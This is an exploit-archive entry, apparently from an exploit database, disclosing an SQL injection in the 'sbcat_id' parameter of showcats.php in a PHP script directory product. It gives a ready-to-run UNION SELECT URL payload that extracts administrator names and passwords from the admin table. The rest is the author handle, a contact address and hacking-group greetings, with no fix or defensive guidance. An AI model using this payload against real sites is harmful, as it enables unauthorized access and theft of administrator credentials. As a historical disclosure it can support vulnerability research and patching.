PHP Script Directory Software (sbcat_id) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP Script Directory Software (sbcat_id) SQL Injection Vulnerability
# Published : 2011-01-28
# Author : BorN To K!LL
# Previous Title : AWCM v2.2 final Local File Inclusion Vulnerability
# Next Title : PHPDirector Game Edition (game.php) SQL Injection Vulnerability

==
Author: BorN To K!LL - h4ck3r
Contact: SQL@hotmail.co.uk
==
Script: PHP script directory software
Version: n/a
Link: http://www.softbizsolutions.com/script-directory-software.php
==
3xploit:
[path]/showcats.php?sbcat_id=[SQL-Injection]

3xample:
[path]/showcats.php?sbcat_id=-9999+union+all+select+1,concat(sbadmin_name,0x3a,sbadmin_pwd),3,4,5+from+sbrrs_admin--

==
Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
==